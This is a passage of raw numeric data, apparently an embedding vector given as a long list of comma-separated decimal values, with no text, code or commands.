0.001771929,0.004105681,-0.027899101,-0.017462248,-0.014379971,-0.020314638,-0.0031087087,-0.018240929,-0.013851742,0.015455241,0.0052478584,-0.025314653,0.008466275,0.04577799,0.00075492595,0.0037640939,0.02042464,-0.006687772,-0.013605204,0.041863695,0.0041548526,-0.009857799,-0.0039009652,-0.0091133,-0.01986461,0.0096702995,0.011144994,-0.0076572425,0.010059902,-0.010937227,-0.023745792,-0.009165012,-0.0018291293,0.039706502,0.003982413,-0.00889696,-0.012149628,0.011661663,0.01115159,-0.01401707,0.017017772,0.010293826,-0.020308852,0.0027734595,-0.0071236636,-0.0063944417,-0.004209599,-0.047320127,0.016173026,0.02480401,0.011495243,0.010429781,-0.010494895,0.0252656,0.050730526,-0.034214515,-0.037120722,-0.020402351,-0.00020274273,-0.006020672,0.0011036356,-0.018122796,0.00033583358,0.007820146,0.018416714,-0.02917676,0.01109836,0.0015727453,0.018418523,-0.008413421,-0.03904171,0.025112377,0.03221649,0.013430883,0.012908246,-0.012261544,-0.0027633272,-0.021578822,0.022939455,-0.024722252,-0.0051050093,-0.00782303,-0.014226242,0.019009285,-0.0135042025,-0.013728506,0.0026887138,-0.009098511,0.0065500056,-0.022196649,-0.014471333,-0.00037543906,-0.010283665,-0.002676283,-0.004242054,-0.016665403,-0.008490181,0.030293202,-0.0106505975,0.0008758752,0.02154953,0.009634554,0.0020652043,0.009153912,0.030891612,0.03135278,0.0036374717,0.016043538,0.020930195,0.010067324,0.007987269,-0.010394621,-0.016499681,0.0043662423,-0.016137106,-0.021812616,0.0026409829,-0.0126610305,-0.0147946635,0.014708866,0.01139616,-0.0025844248,0.039150547,-0.025303047,-0.0037025996,0.015271175,-0.016322127,-0.0036391804,-0.02658327,0.006750853,-0.015516106,-0.005994644,-0.01706089,0.027931843,0.022020726,0.01488819,0.016007742,-0.00809903,0.028610341,-0.012162054,-0.015117189,-0.011801561,0.008294953,-0.007960784,0.0095937215,0.008447807,-0.032205198,-0.004783824,0.0011119356,-0.01458281,-0.041951135,0.042588186,0.032210417,0.004198948,0.025709338,0.026625978,-0.01041653,0.015154529,0.009614922,0.045283433,-0.00687643,-0.022482751,-0.034295514,0.0012613934,0.013680246,-0.0060253358,-0.0069647804,0.011338253,0.011819321,0.02903822,-0.0019061484,0.009646933,0.03260338,0.009128111,-0.03235631,-0.0022280242,0.021990953,-0.0061895084,0.038700566,0.016092405,0.015570457,-0.0069463775,-0.026637195,0.009722653,0.017621657,0.013248183,-0.00516409,-0.0047939965,-0.011566985,-0.005623605,0.0033740369,0.01976372,-0.002215199,0.011389434,-0.0143977925,-0.0038280692,-0.0040425127,-0.020133123,0.010529878,-0.006138628,0.01176094,-0.0027704698,-0.013332479,-0.025303269,-0.0023517516,-0.0067035253,0.007779441,0.009164679,-0.0098077515,-0.011291359,-0.0074991887,-0.017184226,0.018778449,0.008015083,0.020950995,0.017169522,0.01139636,-0.010115705,0.020843094,0.011934088,0.006453697,0.0066413945,0.022175154,0.024115277,0.008462954,-0.00031803534,0.024343725,0.0020452887,-0.0063260146,-0.005941336,-0.030964335,0.02100564,0.0045444467,0.0074583343,-0.011734271,-0.009077676,-0.0020851549,0.0059501017,0.0072617093,0.004033518,-0.009044936,-0.0019841662,-0.018473884,-0.025610365,-0.011686776,-0.008366849,-0.017686713,0.004616874,0.013286965,-0.016011003,-0.0037064715,0.0007404622,-0.02358587,-0.00948325,0.0020083906,-0.004743462,0.002353405,0.022906665,0.0006922226,-0.006462555,0.0017659758,0.01836587,-0.013743934,-0.013050416,0.00091723894,-0.0074050166,-0.013960672,-0.003536108,-0.016714036,0.0220714,0.0056267413,0.009431571,0.010289262,0.010985805,0.032716434,0.009073733,-0.004824061,-0.017316176,-0.0037731277,0.0047979583,-0.007446617,-0.0016227224,-0.010026402,0.011984786,-0.0149901705,-0.0074379514,0.0031396276,-0.013877113,0.011527935,-0.014811636,0.00834826,-0.08318972,-0.0069390154,0.0019346945,0.03319783,0.001401614,0.03948661,0.023334311,-0.006691474,-0.021041442,0.008434795,-0.00047353015,-0.007996517,-0.024522023,0.0018932413,0.003487524,0.010219699,-0.030459309,-0.02741376,0.003935511,-0.016393978,-0.025101386,0.02531966,0.014716941,-0.008892692,0.008196996,-0.010320737,-0.00023023153,-0.0015253783,-0.022931915,-0.035649065,0.016029812,-0.0061211665,-0.015052322,0.010242689,-0.032700624,-0.008889342,-0.0077650854,-0.024952065,0.00038485858,-0.008767232,-0.0046939664,-0.014682619,0.0030375517,0.012394017,-0.022297105,0.03069097,-0.03158976,0.014607601,0.024370058,0.025224363,-0.020955138,-0.0023928315,-0.00984765,-0.0007694936,0.0076541,0.0075453673,-0.009447033,0.03946811,0.020441584,0.0066861445,0.01257462,0.006561446,0.011790034,-0.014551809,-0.01406786,0.007139123,0.034762226,-0.0017499529,0.017518226,-0.008747619,0.008789211,0.02795395,-0.0066990294,0.0053940266,0.029566165,-0.011566088,0.011948595,-0.01469719,-0.0050840583,0.01938558,-0.00891686,-0.02055644,-0.008973569,0.032173604,0.0056562526,-0.0035547614,-0.0016792715,-0.0013848199,0.01855269,0.030893438,-0.031164065,0.0005711785,-0.0024300427,-0.02641946,-0.017578939,-0.033361934,0.00015404534,-0.03677789,0.00083113246,-0.0068560885,0.008009739,0.007735976,0.010116544,0.009134589,0.0052216863,-0.00924354,-0.015728358,-0.011777626,0.0031903398,0.0002273416,-0.012767431,-0.025020607,0.011930217,0.008939992,0.012711592,0.013957084,-0.020974604,-0.0155073125,-0.010202673,-0.016167462,-0.0073707374,0.01246782,0.03845365,0.018430227,-0.027274698,0.004288293,0.0006763339,0.008242744,0.0019465237,-0.009078407,0.00996642,-0.014727055,-0.002902726,-0.0049726167,-0.028964814,-0.01183428,0.009260514,-0.026013188,0.005589479,0.0075680213,0.0056478647,-0.010278409,0.027226701,-0.018809902,0.03366223,0.047896806,-0.023543248,0.0165653,0.0015383887,0.025525587,0.008742473,0.009561555,0.020218043,-0.039694335,-0.008780072,0.03125287,-0.0023285183,0.009564283,0.004393732,-0.0043567163,-0.022617573,-0.004956138,0.005364804,-0.02381231,0.013183657,0.010196553,-0.0344677,0.020994797,0.008529746,0.02009697,0.013825159,-0.000025427304,0.01680895,-0.016334176,-0.0080091525,-0.041823544,-0.014393608,0.010574269,-0.025189921,0.013384974,0.0010037916,-0.03512816,-0.010788225,-0.012673917,0.024268294,0.009616382,0.02259185,-0.013591867,-0.0027655277,-0.0056602117,0.011480992,0.0121031,-0.0072573447,-0.021932155,-0.026602896,-0.00040951138,-0.00537049,-0.0030573325,0.003944689,-0.011739415,0.023753114,0.014632533,-0.01811737,0.012185421,-0.008581434,0.008810058,-0.0017773117,0.031763755,-0.0012056251,-0.0028230278,0.0040881177,-0.027658818,-0.010397907,0.016234918,0.00009135897,-0.0015980963,-0.0030798714,-0.026604561,-0.02838602,-0.026398772,-0.011599743,-0.0059033856,0.027915329,0.007162026,-0.009167841,-0.010565612,-0.008910392,0.045607854,-0.010942006,-0.010889421,-0.0036219233,0.008090686,-0.029412694,-0.020943273,0.0033929904,-0.020898225,0.00998188,0.019933034,0.005160005,0.009901601,0.024615236,-0.009988934,-0.010568564,0.006012798,0.0018397111,-0.007295112,0.005093962,0.0045461706,-0.004020218,0.000040508854,0.04580439,0.00865283,-0.020371597,0.012612248,0.025830634,0.022524964,-0.036376312,0.00041497784,-0.02993965,-0.020564038,0.021990845,-0.02838121,-0.0072422237,-0.02008493,0.00014486955,-0.00561996,0.002983557,0.014374705,-0.012264307,-0.009910783,0.010766687,-0.010060197,0.00043679005,0.026602173,-0.0029773114,0.005726089,-0.00024556622,0.00028655317,-0.011239804,-0.00986687,0.005750255,0.009529274,0.023618786,-0.000511503,-0.0011135805,-0.005713302,-0.014499197,0.003458579,0.00092045084,-0.029503955,-0.005556337,-0.006778738,0.011250858,-0.014342403,-0.015148983,-0.022644993,-0.053544227,0.0069441036,-0.03016541,-0.022220535,-0.0062836604,0.0071356483,0.017769406,-0.014015443,0.032250874,-0.004496932,0.017338129,-0.011517083,0.03286394,0.0018933229,0.002345437,-0.011783509,-0.021683194,-0.011901931,0.005536655,0.0055792513,0.0063708397,0.014812263,-0.008030101,-0.011479958,0.022334777,0.019646296,0.00076338055,-0.011234685,-0.022023622,-0.01183004,0.006347778,-0.0077820336,-0.018660942,-0.015882192,-0.010173741,0.014425994,0.012326343,0.016835691,0.0026255844,0.0020467646,-0.008755241,-0.024050923,-0.00624008,0.019091977,-0.010544212,0.0035183947,0.022041619,-0.011871412,0.024937816,-0.0058675865,0.014037941,-0.008847208,-0.015289969,0.027301518,-0.0068487274,0.022156607,0.013248552,0.018970663,0.028614203,0.02730149,-0.008843111,0.0014429766,0.026460798,0.019708563,-0.009971999,-0.01747761,-0.008079877,0.008051424,-0.022335049,-0.014010295,-0.027980149,-0.016046919,-0.0064014844,-0.003930648,-0.01308723,0.014489246,-0.022824919,-0.026845902,0.004150527,-0.030259028,-0.026311329,0.00443135,-0.014632619,0.025898246,0.0030660701,-0.009416071,0.006327066,0.002558946,0.0051957197,-0.00845951,-0.028538756,0.0008723316,-0.0053660385,0.026186908,0.021775322,0.0063279923,0.009551662,-0.01275533,-0.008493829,0.0048540817,0.0026006915,-0.014946679,-0.015869005,0.038502138,0.0035935072,0.0011149284,-0.011388242,0.038958576,0.0023688138,0.02499617,-0.016856162,0.0009782342,-0.00055125507,0.01726888,-0.0131271435,0.01146886,-0.005875199,-0.009096745,0.0111722,0.03040105,0.0034622254,-0.009707129,0.0113653205,0.004793619,0.0056618187,0.00043325083,-0.010842069,-0.00030430767,-0.013138414,0.01581929,-0.008893784,-0.010279963,0.0018937426,0.012532408,0.014453603,0.022862814,0.01648989,-0.015486664,-0.004260274,-0.0061867964,-0.023254506,0.0014509831,-0.039394364,0.0012177293,0.03679962,-0.012643668,0.007505959,-0.017361412,0.010186369,-0.006002497,0.0049928846,0.008180368,0.013999953,0.011311509,-0.0137998955,0.015999217,-0.010194603,0.0096018305,0.020127738,-0.014084917,-0.007756824,-0.0077572437,-0.000774621,-0.009362748,-0.011108823,-0.017252354,-0.019777741,0.009292043,0.007790598,-0.011167871,0.0014764502,0.013591995,-0.018772595,0.035981555,0.003048904,-0.027532704,0.042605937,0.005973941,0.0005442007,0.043060984,0.018310832,0.02316801,0.00052097184,-0.0041492726,-0.0076596537,-0.017230479,-0.004352656,-0.00023433357,-0.012318743,-0.034114502,-0.017232023,-0.026812922,0.004958488,-0.013074595,-0.014991932,0.02221946,-0.015409734,0.0382089,0.004446866,-0.004075731,-0.0062419875,-0.0019230614,0.009950392,0.01277607,-0.012817813,0.0019742663,0.011050085,-0.02273211,-0.008116504,-0.0033859755,-0.010756153,-0.008788162,-0.017897712,-0.0055739316,-0.01603492,0.0014844876,-0.01062869,0.0012736184,0.0069252797,-0.023204625,0.004372851,0.016868196,0.00232697,0.010626293,0.014539943,-0.012362427,-0.018411445,0.033926208,-0.008544315,-0.0036281634,0.0314322,-0.012707231,0.033298515,-0.021566866,-0.027343534,0.009401264,-0.013830368,0.008940705,-0.010187011,0.003860141,-0.0011127178,0.0067101405,0.015135648,0.003183255,0.014300406,0.018695407,0.019849353,-0.016665392,0.020835588,0.018368328,0.017666968,-0.01780216,0.008351149,-0.02336329,-0.02519321,-0.025919838,-0.023136014,-0.014513425,-0.00006345916,-0.027534103,0.015171971,-0.00040409618,-0.011519219,-0.012366054,-0.007577631,0.0036381846,0.030391693,0.0059003364,0.045417845,-0.017594343,-0.004595538,0.02403841,0.0042625815,0.02267642,-0.009765021,0.007229246,-0.016650496,-0.01528912,0.0146439755,0.004984447,0.00077021966,0.017497318,0.02144242,-0.02120156,0.026463179,0.013640054,0.0029294123,-0.007435767,0.0068510813,-0.00678002,-0.011512283,-0.016015457,0.0036136534,0.006256986,-0.0035932092,0.01234318,-0.017248932,-0.015929503,-0.010555297,0.009514082,0.0816066,0.014601636,0.004709737,0.003540767,0.006406779,-0.012780323,0.0010150681,0.03447509,0.0048011346,0.0041303416,-0.015017562,-0.030030554,0.0015174014,-0.000016307482,0.004863102,-0.014522839,-0.0130658,0.010465391,0.024094453,0.012468063,0.0031463627,-0.016186392,0.0010493868,-0.0115683405,0.0037833755,0.0063995034,0.008068025,-0.024804143,0.0077225994,0.033364832,-0.004749874,-0.017247435,0.004195649,0.026757115,-0.014063899,0.0054800315,0.024519267,-0.0198798,0.011574198,-0.008568068,-0.00984305,-0.0062667388,0.020645188,0.014001791,0.00059057056,-0.010047922,-0.00083431293,0.020966992,-0.0058927503,-0.009558943,-0.009813508,-0.0147526525,-0.012027189,-0.017508259,-0.013655149,0.006297045,-0.022970393,0.02356169,0.0033591487,-0.00034302045,0.014110754,0.012250178,-0.011331532,-0.018822625,0.0046204147,0.009845029,0.013985409,-0.0075650797,0.01899803,-0.01078785,0.0015705521,0.0057428316,0.0043860227,0.024524145,-0.014151315,0.010386003,-0.008705201,-0.008281337,0.009281338,-0.030575952,-0.015253367,0.014921244,0.01010665,0.013463927,0.016985947,0.0076550934,0.011587245,0.019490298,0.031701263,0.010263971,-0.021670615,-0.029516632,-0.00198483,0.012518763,0.0050703166,0.01598791,-0.020685835,0.012901971,-0.03609955,-0.0031493953,-0.005156978,0.0085785985,0.011439876,-0.02302095,0.035979073,0.0007272829,-0.015693577,-0.049233746,0.021445844,0.04549136,-0.015815737,-0.0040478334,0.007491877,0.00020863647,-0.0015727626,-0.008385877,0.006066022,-0.0017945616,0.009159701,0.0023304475,0.023626845,0.00008254869,-0.018099483,-0.052174572,-0.0031153993,0.10600444,0.017866872,-0.0026383668,0.03243544,0.008155096,-0.00564358,-0.097638935,0.00858082,-0.009131893,0.018385295,0.0090704085,-0.008628285,-0.0033991744,0.004816916,0.011892355,-0.02571032,-0.0010068446,-0.024292657,0.006942198,-0.0114966,-0.0017077535,0.020617822,0.004362823,0.0056833075,-0.0298907,-0.015859548,0.011161175,-0.018579625,-0.0013439142,-0.018251985,-0.004500123,0.021938864,-0.0011095357,-0.011195263,0.011320427,0.019559616,0.02078617,0.0010261558,-0.016785597,-0.0027133937,0.025876466,-0.013340298,-0.01694547,-0.023478512,-0.13709782,0.006598262,0.005334328,-0.042623036,0.012060303,-0.028217474,-0.015120043,0.008125213,-0.0030297802,-0.01443359,0.025535477,0.019007389,-0.038311962,0.0069535915,-0.022751765,0.026891591,0.0056646015,0.0059890687,0.008524113,-0.0060231374,0.0068372185,-0.0037426886,-0.013686731,-0.0027639947,-0.0029834143,0.02753113,0.014485982,0.036677882,-0.0029343371,0.022201402,-0.010947536,0.018646354,-0.027017785,0.012300095,-0.005191312,-0.018317763,0.008749378,-0.0010680796,-0.02055719,0.023589803,-0.011626723,0.0045560086,-0.025128705,-0.023692094,0.0067726816,0.01765741,0.041576963,0.011993012,-0.0030257972,-0.0005225775,0.011299027,-0.0014846612,-0.009822482,0.0207052,-0.0007704421,-0.0034208463,-0.0067442055,0.0012222988,0.0061306735,0.0038693016,-0.008342203,-0.013384776,-0.006483334,0.006755013,0.0029803729,-0.014541052,0.005191143,-0.03773542,-0.00037591855,-0.017713571,-0.005498752,-0.013379445,-0.00043489583,-0.010829647,0.0028613566,0.0075023444,0.0008416982,-0.0056296573,-0.000049915936,-0.02198649,0.0025712135,-0.014283924,-0.0068157935,-0.0058411546,0.019522827,-0.003546836,0.042470496,-0.009304426,0.017773103,0.010034202,0.037910044,-0.0029736222,-0.006952063,0.0060934834,0.014022241,0.009083875,0.04141641,0.0052869204,-0.019329144,0.014443586,0.008065022,-0.01455386,0.001718432,0.014870432,-0.029694134,0.0074618445,0.020321555,-0.018227661,-0.017110094,-0.018187925,0.021300225,-0.028211417,0.016356332,0.029948805,-0.030447261,0.026611414,0.015776929,0.0052394485,0.011819713,-0.019050736,-0.021676473,0.026859125,0.012628375,-0.0027595414,0.027797641,-0.014491738,-0.01520595,0.009670812,-0.016076019,0.019411922,-0.02180862,0.017270831,-0.012708236,0.018448165,0.0084182555,0.003528739,0.013026604,0.012228296,-0.01383569,0.017453903,-0.00901347,0.015972044,0.008740838,-0.017104572,-0.011238779,-0.013090592,0.0015683176,-0.011950307,0.04147375,0.017693602,0.0129596675,0.012467839,-0.0021196082,-0.02841647,-0.0039015242,0.06252757,-0.0065654577,-0.016740179,0.01758721,0.024367448,0.0042077405,0.016580788,-0.03032541,-0.017536147,-0.019432187,-0.0083499905,0.014459086,-0.010187996,0.0028478645,-0.026679836,0.02397121,0.02005575,0.005158261,-0.0099955555,0.0015510974,0.00808604,0.0068178573,-0.016603444,0.013955613,-0.0039518615,0.013793934,0.0020336644,-0.006864504,0.0073783873,0.013227221,-0.017740084,0.000031796997,-0.010868875,-0.008497125,0.022505976,-0.038052082,-0.020055741,0.005834413,-0.0008230445,0.001378483,0.0073596737,0.010384717,0.018093517,-0.023861466,-0.020134958,-0.020783316,0.0018473198,0.021140534,0.012295128,0.008547828,-0.004922409,0.004850205,-0.027509123,-0.0056161485,0.0021045038,-0.0045390334,-0.006885181,0.003184164,0.005302827,-0.018206555,0.011900384,-0.009505873,-0.015230925,-0.013425418,-0.004600231,-0.012245861,0.0054770433,0.00405519,-0.006354622,0.0057168556,0.0019724076,0.0014491181,-0.010390547,0.048308127,0.014412648,0.013362585,0.0029501468,0.0067004273,-0.014740745,-0.004833043,0.0318276,0.013847933,-0.0015779389,-0.011529088,-0.0030350154,-0.019006215,-0.017472195,0.033892162,-0.028686713,-0.0010642662,-0.0147220595,-0.014878599,0.043495856,-0.004811406,0.018443353,0.0029426173,0.008429811,0.017755827,0.006901321,0.0031469634,-0.0050773947,0.018810125,-0.010966672,-0.01006478,-0.0053900494,-0.010751591,-0.00827213,0.013179855,0.0145135475,-0.01339473,-0.016774455,-0.009716075,-0.0013678785,-0.028787572,-0.008552792,0.01918717,-0.020709733,0.009321522,0.02211405,-0.018331181,0.008581866,-0.01446213,0.0065745255,0.0033844616,0.030117793,-0.015552826,0.0068628755,0.0021964046,-0.025484959,-0.008580263,-0.011380523,0.018855182,0.021829767,-0.02261689,-0.007645063,0.014572748,0.010038705,0.020642545,0.007040436,0.003621055,0.012991996,-0.014988375,0.008342996,-0.00595512,-0.0054910686,0.006254755,0.01565808,-0.032188714,-0.015064375,0.01946151,-0.01820003,0.013467246,-0.0073933783,0.0045745154,0.003786676,0.020046359,-0.005883379,0.00060148834,-0.02251673,-0.013154642,0.030631471,-0.00072022947,-0.014426936,-0.022444468,-0.025017204,0.009970225,0.015084486,0.0024004853,0.026784126,0.0024421331,0.002647228,-0.03487026,0.0078090695,0.009761017,0.008998552,-0.008614727,0.016697107,-0.010542753,0.011807397,-0.0124710975,0.004914774,0.017214652,-0.029999409,0.0017424087,-0.0022148783,0.014148121,0.010788079,0.03702523,-0.013835899,0.000947215,0.015919207,-0.034392074,-0.0029152364,-0.0038058285,-0.032961305,-0.018877676,-0.0019252145,-0.013325381,0.011587567,-0.0057622204,0.030278267,0.038751163,-0.025861107,-0.015087369,-0.011336196,0.018423587,-0.013805558,-0.010938091,-0.0019373382,-0.01686102,-0.014076405,-0.00720013,-0.018927526,0.019925844,0.010200385,0.013551437,-0.0074588805,0.03781306,-0.0014167882,-0.016760103,-0.013673972,-0.013068747,-0.0058625136,-0.0059370566,-0.008290614,-0.02557685,0.007544443,0.021744968,-0.010000163,0.0011134907,0.010752664,0.03813792,0.036785804,0.029354608,0.013296266,-0.017838987,-0.021353837,-0.0071044704,-0.012496602,0.00062806514,-0.0260127,-0.03368775,0.006469311,0.0019119926,-0.008299356,-0.0027004285,0.02303424,0.017373305,0.020080946,-0.0069072424,0.01648937,-0.028022276,-0.015189546,0.009951109,0.01420729,-0.0009064642,0.0013891535,0.00504609,-0.006637725,-0.04343129,-0.0065797605,-0.021833984,-0.012472358,0.0055816146,0.0015970981,0.020352587,0.02854025,0.035465267,0.018036311,0.0024699878,0.020304395,0.012478018,-0.020482691,0.0041420576,0.021811219,-0.028563317,-0.005227918,-0.022227764,0.022144673,0.019802684,-0.0031900145,-0.02663425,0.030426556,0.004518178,0.010570674,-0.019798724,-0.0009318026,0.046097077,-0.004663,-0.024967143,-0.026061391,0.018185904,-0.0022786928,-0.018926656,-0.037031114,0.0019237249,-0.004480581,0.005365905,0.018704563,0.010780493,0.0014922263,0.0014919456,0.007982116,0.006219421,0.018786138,-0.0260206,0.03400286,-0.0042250757,-0.004097898,0.012560881,0.012104364,0.001139678,0.025864566,0.005315823,0.022556545,0.011840148,-0.017378129,0.028326279,-0.021014689,0.0013944653,0.018987097,0.004324248,-0.005746503,-0.006890824,-0.0141775645,0.00020230433,-0.02840075,-0.0046862867,0.014239309,-0.015922973,-0.015445914,-0.022697084,-0.004445138,-0.161432,-0.007588168,-0.005479058,-0.0077965446,-0.010038352,-0.015547275,0.00041945576,-0.007697362,0.0055789542,0.005339004,-0.014002298,0.014466515,0.014639473,0.008276864,-0.00039494265,0.0058092726,-0.033083934,0.006592897,-0.01689142,0.018040037,0.012037318,0.005172755,-0.011384754,0.016054312,0.0154770035,0.007156383,-0.0056076176,0.010177768,-0.014330042,0.011547003,-0.0060759187,0.023927491,0.00059657404,0.026650222,-0.0053559868,0.016075395,0.013475075,0.02193602,-0.0059749084,0.016701316,-0.018352294,-0.006387776,0.0007892057,0.022370208,0.019410836,0.0059535457,0.013066624,0.015259104,0.015737152,0.0144391125,-0.017215945,0.0007382777,0.0042408677,-0.0050721355,0.015464107,0.00017868777,0.00057843776,0.008207155,0.0142195355,-0.004198423,-0.00647277,0.009889446,0.008216134,-0.023969421,0.022010157,-0.01877834,-0.0004020433,0.011370084,-0.01073041,-0.0015510708,0.02377383,0.019293904,-0.0124217095,0.003973834,-0.01068431,0.009895116,0.012040423,-0.0058310158,-0.03129832,-0.0050542317,-0.020558333,0.0010461896,0.0009383421,-0.0011450625,-0.020444809,-0.005648214,0.016456075,0.042995635,0.016730705,0.02304011,0.008160415,-0.011030036,-0.0100321295,-0.0018319419,-0.01153634,0.0070781284,-0.010765244,0.014072447,-0.016825212,-0.020899005,-0.0049834927,-0.006304369,0.0020038432,-0.016761983,-0.14771989,-0.0011513693,-0.00267983,0.0071650106,-0.0032282856,-0.02320789,0.017014125,-0.011691103,0.040473104,-0.0032164725,-0.009170948,-0.009080122,-0.01603915,0.00085477595,0.0014445642,0.0017322338,-0.017521044,0.005532634,-0.0056725005,-0.0006878575,0.002770148,0.00277777,-0.0075328504,0.030927818,-0.021752475,0.015338591,0.0038154714,0.04634669,0.013702844,0.01571446,-0.0070908605,0.032494836,-0.008898864,-0.035041466,-0.06401068,-0.000017554126,-0.00033211472,-0.0018846979,-0.012686744,-0.014925329,-0.003507092,0.0076046237,0.014889874,0.023322633,0.0009011542,-0.035005063,0.007897917,0.025243258,-0.025723502,-0.014264091,-0.015859732,-0.006363249,-0.00027458952,-0.007262489,-0.009531554,-0.00048567858,0.019262973,-0.009045792,-0.004428107,-0.00867409,0.023048129,0.028096972,0.004853497,-0.0083587775,-0.009407047,0.024160054,-0.007616573,0.011740751,0.014801489,0.018395642,0.009774219,0.024442343,-0.0040552006,-0.015983794,0.022051696,-0.013898783,0.014327567,0.01075842,0.029588047,-0.0075794104,0.002770806,0.0058875233,-0.004538855,0.0031815013,-0.021284988,-0.010589026,-0.0059411717,-0.007880541,-0.005718407,-0.002885066,0.01514656,-0.0043194992,0.009542106,0.04024283,-0.003372438,0.005636369,0.034603864,0.009682585,-0.037819322,-0.013922714,-0.030974304,-0.0211246,0.015914002,-0.024414392,-0.01221229,0.016253987,0.0412535,-0.012002064,0.010381241,-0.016622929,-0.0066040186,0.002872222,0.013049453,-0.000026368241,0.0052011074,-0.01037332,0.010909478,0.008570221,-0.0022845655,-0.014831431,0.015546387,0.038905535,0.009498738,-0.0069271983,0.02691076,-0.0099732075,-0.00311477,-0.0015524334,-0.0047901976,-0.020485228,-0.0043015024,-0.026000641,0.0071045384,0.000058477453,0.012652901,0.010495412,0.003704665,-0.010580117,0.010609029,-0.007886004,-0.0131540755,0.000986412,-0.007882833,0.0014357301,-0.024990026,-0.005998176,-0.01949026,0.0021370726,-0.003781661,0.0053177327,0.0026958287,-0.012962417,0.012868078,0.007684933,0.014180625,0.008585161,-0.008320087,0.011845383,0.014740802,0.0008887986,0.012074587,-0.0032621678,0.012005564,-0.004654458,-0.02079373,0.011506185,-0.0110413255,-0.009895679,-0.002056002,-0.015995415,0.0141333025,-0.0052413335,0.015097609,-0.043300692,-0.01594319,-0.011285304,0.009428514,-0.008042167,0.018960735,0.0026440036,-0.0063498085,-0.0011279277,-0.00898734,-0.00057247153,-0.009763545,0.01216081,-0.0035971615,-0.014408412,-0.012562702,-0.00096686336,0.0012040307,-0.017642554,0.023417605,-0.0053061754,0.0008294655,-0.009242588,0.0037099312,0.0130273355,0.013857139,-0.003792998,-0.01841871,0.008593399,-0.003104768,0.016973956,0.0067156223,-0.0067801843,0.006269905,0.042970277,-0.009135688,-0.0239764,0.000523138,0.020510158,-0.013134064,0.0034893677,0.009814843,0.01061147,-0.003253592,-0.012673567,0.016465874,-0.0067133964,-0.010048416,-0.013253445,0.012850162,0.015077051,-0.016352355,0.0019985866,-0.005385118,0.041003447,-0.01305079,-0.014500322,0.024062173,0.011533544,-0.035940595,-0.0125988,-0.0015346793,-0.023013407,0.024675561,0.014811217,0.02148289,0.006389794,0.030518131,0.0003198437,0.018933639,0.016242322,0.0053172875,0.0017773048,0.021356514,-0.014344379,0.04688712,0.030723197,-0.010937692,-0.0082593,0.00011222166,0.00850747,0.0050390917,0.020639956,0.011486314,-0.01040036,0.011821649,0.016504606,-0.021004405,0.016945476,-0.027936354,-0.011211889,-0.026745692,0.012196029,-0.0080763735,-0.028984759,0.020082546,-0.0031596932,0.012456049,0.0067670457,0.016494583,0.030402316,-0.028113848,0.0015761876,0.016438996,0.009491053,-0.0085077435,0.010521329,0.0041103484,0.013803677,0.00048794487,0.018426605,-0.014162779,0.005883276,-0.009844134,-0.024723021,0.000031167714,0.0036712298,0.031327385,-0.01092387,-0.011310738,-0.026283773,-0.016930984,0.0127448365,0.01184287,-0.011371056,-0.021743039,0.015223569,0.01249868,-0.023951922,-0.014383952,-0.00520389,0.017086515,-0.00074102083,0.0041948715,-0.0011610863,0.0036777072,0.01320857,-0.0049256617,-0.004598834,0.017595332,-0.01274386,-0.00019707555,0.005952178,-0.018700212,-0.0003409545,-0.019802801,-0.019699536,0.0031260366,-0.039038755,0.0033005024,-0.024570107,0.001303706,-0.003508196,0.007494986,0.017916342,0.0031512019,0.01675512,0.016322395,0.0057379208,-0.024657961,-0.0022298875,0.013002573,0.016276648,0.030317442,0.030465422,-0.004242311,-0.0008103871,0.007041106,0.004717734,-0.015180175,0.0063359346,-0.013235355,0.0047605573,0.007503311,-0.005031777,0.014290587,-0.0123893,0.013269108,-0.00072850543,0.008818109,-0.0040335213,-0.0297975,0.01058128,-0.018913662,-0.0018180652,0.017713936,0.022576667,-0.027025541,-0.014530799,0.016818702,-0.019978937,0.005430106,-0.025399664,-0.018256849,-0.0010455366,-0.03357672,0.012676587,-0.019902743,0.0008972052,-0.016148426,-0.018615268,-0.00032811277,-0.0815884,-0.015568202,0.02530995,0.006658004,0.013845841,0.00079745316,0.0073809777,-0.004587251,0.00027819184,0.0355201,0.01115942,-0.01738769,-0.009922202,0.009347778,0.010939951,-0.010216848,-0.018939469,0.012197263,-0.013867119,-0.041303843,0.001392046,-0.008143944,-0.010382779,-0.026440788,-0.004396923,-0.015954947,-0.0118646175,0.0054064,-0.0045343623,0.009903794,0.005851438,0.013922073,0.01139075,-0.009164161,-0.007974013,0.015815396,-0.014846961,0.021644285,-0.005097021,-0.005778613,0.0039194594,0.004951273,0.009394404,-0.00081945624,-0.00659577,0.010573481,-0.015798168,0.020277426,0.0010641481,-0.009396304,-0.011487944,0.023658194,-0.007904114,0.026864508,-0.001582995,0.009951039,0.0024006309,-0.0073625254,0.011843197,0.007077863,0.0069637573,0.033166423,-0.006242856,-0.030871073,0.015000584,0.002999031,0.008211505,0.032310273,-0.01320399,-0.0077961455,0.02267088,-0.018966762,-0.0039346386,-0.009828871,-0.013761506,-0.00085436046,0.028646037,-0.014716718,-0.018276254,-0.0021769155,0.04196146,-0.0051119286,0.0012047943,0.018774157,0.0029044314,-0.0044341376,0.013589143,-0.00541745,-0.0018964696,0.03421979,-0.0072795963,-0.017366432,0.016113233,0.009622257,0.00058843155,-0.0015483726,0.0020164025,0.015502895,0.012263664,0.005738175,0.0072390283,0.023197068,-0.0053049093,0.006515746,-0.027938033,-0.012867423,-0.024509562,-0.03209511,0.008340249,-0.007494173,0.005596272,0.009767562,0.021585783,0.022509612,0.009000244,0.022023749,-0.0041498863,0.03462242,0.014968905,-0.036453925,0.00442864,-0.034389764,-0.01018461,0.038805343,0.034470044,-0.00049564976,0.026005762,-0.019352948,0.0014233901,0.015260836,-0.03629874,0.026977526,-0.003777731,0.008530123,-0.0009520337,0.014877316,0.0015224984,0.035470333,0.0022512982,-0.0018196796,-0.018555108,-0.006805938,0.016223919,-0.025880452,-0.014990936,0.045108527,-0.049186483,-0.0009087986,0.010497496,-0.013459173,-0.02422647,0.018232862,-0.016095176,0.002263517,0.016899977,-0.010337536,0.011140024,-0.0130553385,-0.012512434,0.022768212,-0.0029320847,0.027553605,0.009060597,-0.010634245,0.01595997,0.005336056,0.0159383,-0.0033635588,0.010222742,-0.029531218,0.01019493,-0.013091334,-0.010131731,-0.017665436,-0.0134162055,0.0066000284,-0.007834259,0.026065638,-0.014813313,0.018783635,-0.0051844656,0.011403504,-0.015375578,0.004068482,-0.027170138,-0.012972217,0.016201917,0.0035864322,0.008092627,0.001929175,0.009517894,-0.010644472,-0.004313399,-0.0010449544,0.0040279604,0.012162663,-0.0007092361,0.0050801397,-0.02275421,0.008472013,-